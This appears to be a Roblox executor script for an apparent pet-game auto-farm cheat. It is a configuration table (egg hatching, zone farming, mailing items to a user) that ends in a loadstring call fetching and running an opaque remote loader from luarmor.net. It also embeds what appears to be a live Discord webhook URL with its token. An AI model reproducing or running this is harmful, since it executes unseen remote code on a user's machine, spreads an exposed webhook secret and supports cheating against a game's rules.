getgenv().Config = {
    ["Webhook"] = {
        ["URL"] = "https://discord.com/api/webhooks/1451968691129417812/arb_U_Gmdd4HLPwKA301Ifa79sx2QX8yVBgFtHvB7LVTTGss1fWKyNxIgyIwdHHDsE2N",
        ["Discord Id to ping"] = {""},
        ["Send Normal Huges"] = true,
    },

    ["Mail Settings"] = {
        ["User"] = "",
        ["Min_Gems"] = 99999999999999999999,
        ["MAX_MAIL_COST"] = 9999999999,
        ["Mailing"] = {},
        ["Only_New_Huges"] = false
    },
    ["CPU Saver"] = true,

    -- Egg Hatching Settings
    ["Hatch Eggs"] = true,  -- Enable egg hatching
    ["Open Diamond Egg"] = "",  -- Specific diamond egg to open (e.g., "Spring Diamond Egg 100x"), leave empty to disable

    -- Upgrade Settings
    ["Upgrade"] = false,  -- Automatically purchase egg upgrades when possible

    -- Zone Farming Settings
    ["Zone Farm"] = false,  -- Enable zone farming
    ["Zone Farm Count"] = 4,  -- Number of zones to farm simultaneously (max 4)

    -- Token Boost Settings
    ["Token Boost"] = false  -- Automatically add time to token boosts
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/ae895774291a4ad833276f74a2572818.lua"))()
